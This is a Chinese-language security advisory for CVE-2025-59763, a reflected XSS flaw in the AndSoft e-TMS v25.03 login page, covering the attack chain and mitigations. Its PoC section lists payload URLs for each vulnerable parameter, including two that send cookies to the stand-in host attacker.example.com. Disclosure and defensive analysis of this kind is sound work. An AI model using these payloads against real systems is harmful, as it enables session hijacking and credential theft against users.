CVE-2025-59763：AndSoft e-TMS 反射型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-59763

漏洞类型

反射型跨站脚本（Reflected XSS）

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

AndSoft e-TMS

漏洞概述

CVE-2025-59763是AndSoft公司开发的e-TMS（电子运输管理系统）v25.03版本中存在的一个反射型跨站脚本（Reflected XSS）漏洞。该漏洞的CVSS 3.1评分为6.1分，属于中危级别，已于2025年10月2日由西班牙国家网络安全研究所（INCIBE）公开披露。

AndSoft e-TMS是一款广泛应用于物流和运输行业的运输管理系统，用于管理运输订单、车辆调度、货物跟踪等业务。该系统通过Web界面提供登录入口供用户访问。

该漏洞存在于系统的登录页面`/clt/LOGINFRM_EK.ASP`中，具体涉及多个URL参数，包括`l`、`demo`、`demo2`、`TNTLOGIN`、`UO`和`SuppConn`。这些参数在处理用户输入时未能进行充分的过滤和转义，导致攻击者可以通过构造包含恶意JavaScript代码的URL，诱骗受害者点击，从而在受害者的浏览器环境中执行任意JavaScript代码。

由于该漏洞属于反射型XSS，恶意脚本不会持久存储在服务器端，而是通过精心构造的URL即时反射到响应页面中。攻击者通常需要通过社会工程学手段（如钓鱼邮件、即时消息等）诱导受害者点击恶意链接。一旦受害者点击，攻击者即可窃取用户的会话Cookie、劫持用户会话、进行钓鱼攻击或在受害者权限范围内执行未授权操作。

技术细节

该漏洞的根本原因在于AndSoft e-TMS v25.03的登录页面`/clt/LOGINFRM_EK.ASP`对用户输入参数的过滤和输出编码机制存在缺陷。

具体而言，当用户访问登录页面时，服务器会将URL参数（如`l`、`demo`、`demo2`、`TNTLOGIN`、`UO`和`SuppConn`）的值直接嵌入到返回的HTML页面中，而未对这些值进行适当的HTML实体编码或过滤处理。攻击者可以在这些参数中注入恶意的JavaScript代码片段，例如`<script>alert(document.cookie)</script>`或更复杂的payload。

利用方式如下：
1. 攻击者构造一个包含恶意JavaScript代码的特殊URL，指向目标网站的登录页面；
2. 攻击者通过钓鱼邮件、社交媒体或其他渠道向受害者发送该URL；
3. 受害者点击该URL后，浏览器向目标服务器发起请求；
4. 服务器将URL参数中的恶意代码原样嵌入到返回的HTML响应中；
5. 受害者的浏览器解析该HTML并执行嵌入的恶意JavaScript代码；
6. 恶意代码在受害者的会话上下文中执行，可以窃取Cookie、会话令牌，或执行其他恶意操作。

从CVSS向量可以看出，该漏洞具有网络攻击向量（AV:N）、低攻击复杂度（AC:L）、无需权限（PR:N）、需要用户交互（UI:R）的特点，影响范围为变更范围（S:C），对机密性和完整性有低影响，但对可用性无影响。

攻击链分析

STEP 1

步骤1：信息收集

攻击者首先识别目标系统运行AndSoft e-TMS v25.03，通过网络侦察确定目标登录页面位于/clt/LOGINFRM_EK.ASP，并识别出可注入的参数（l、demo、demo2、TNTLOGIN、UO、SuppConn）。

STEP 2

步骤2：构造恶意URL

攻击者构造包含恶意JavaScript代码的URL，利用未经过滤的参数将payload注入到请求中，例如在参数值中嵌入<script>标签或事件处理器。

STEP 3

步骤3：社会工程诱导

攻击者通过钓鱼邮件、即时消息、社交媒体或其他渠道向目标用户发送构造好的恶意URL，诱导受害者点击。

STEP 4

步骤4：触发漏洞

受害者点击恶意URL后，浏览器向目标服务器发起请求，服务器将未转义的恶意参数值嵌入到HTML响应中返回。

STEP 5

步骤5：执行恶意代码

受害者的浏览器解析返回的HTML并执行嵌入的恶意JavaScript代码，代码在受害者的会话上下文中运行。

STEP 6

步骤6：数据窃取与权限滥用

恶意JavaScript代码窃取用户的会话Cookie、会话令牌或其他敏感信息，攻击者利用这些信息劫持用户会话或执行其他未授权操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-59763: Reflected XSS PoC for AndSoft e-TMS v25.03 -->
<!-- Vulnerable endpoint: /clt/LOGINFRM_EK.ASP -->
<!-- Vulnerable parameters: l, demo, demo2, TNTLOGIN, UO, SuppConn -->

<!-- Example 1: Basic XSS via 'l' parameter -->
https://target.example.com/clt/LOGINFRM_EK.ASP?l=<script>alert('XSS-CVE-2025-59763')</script>

<!-- Example 2: XSS via 'demo' parameter -->
https://target.example.com/clt/LOGINFRM_EK.ASP?demo=<script>alert(document.cookie)</script>

<!-- Example 3: XSS via 'demo2' parameter -->
https://target.example.com/clt/LOGINFRM_EK.ASP?demo2=<img src=x onerror=alert('XSS')>

<!-- Example 4: XSS via 'TNTLOGIN' parameter -->
https://target.example.com/clt/LOGINFRM_EK.ASP?TNTLOGIN=<svg onload=alert(document.domain)>

<!-- Example 5: XSS via 'UO' parameter -->
https://target.example.com/clt/LOGINFRM_EK.ASP?UO="><script>alert('XSS')</script>

<!-- Example 6: XSS via 'SuppConn' parameter -->
https://target.example.com/clt/LOGINFRM_EK.ASP?SuppConn=<script>document.location='https://attacker.example.com/steal?c='+document.cookie</script>

<!-- Cookie stealing payload example -->
<!-- https://target.example.com/clt/LOGINFRM_EK.ASP?l=<script>fetch('https://attacker.example.com/log?cookie='+encodeURIComponent(document.cookie))</script> -->

影响范围

AndSoft e-TMS v25.03

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1）部署Web应用防火墙（WAF）规则，检测和阻止包含常见XSS payload（如<script>标签、onerror事件等）的请求；2）实施内容安全策略（CSP），限制页面中可执行的脚本来源；3）对会话Cookie设置HttpOnly标志，防止JavaScript代码窃取会话信息；4）对用户进行安全意识培训，警惕点击来源不明的链接；5）监控异常的网络流量和用户行为，及时发现潜在的XSS攻击。